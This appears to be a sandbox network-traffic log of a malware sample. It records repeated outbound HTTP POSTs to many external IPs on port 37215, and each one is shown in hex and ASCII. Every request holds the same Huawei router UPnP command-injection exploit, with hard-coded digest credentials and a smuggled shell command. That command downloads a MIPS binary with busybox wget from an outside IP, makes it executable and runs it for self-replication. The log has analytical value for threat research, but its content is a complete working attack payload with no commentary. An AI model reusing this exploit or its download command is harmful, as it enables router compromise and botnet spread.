                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3250192.168.2.2337240123.138.232.13837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678595066 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3251192.168.2.2340296157.24.252.7237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678621054 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3252192.168.2.2342810197.1.149.1537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678633928 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3253192.168.2.2353290157.131.189.5337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678721905 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3254192.168.2.2351260157.101.76.19637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678738117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3255192.168.2.2344476157.178.182.14637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678738117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3256192.168.2.2348810197.29.99.25337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678793907 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3257192.168.2.2342662157.32.238.11237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678805113 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3258192.168.2.2341160197.143.71.10337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678813934 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3259192.168.2.2340906157.54.30.6437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.678828001 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
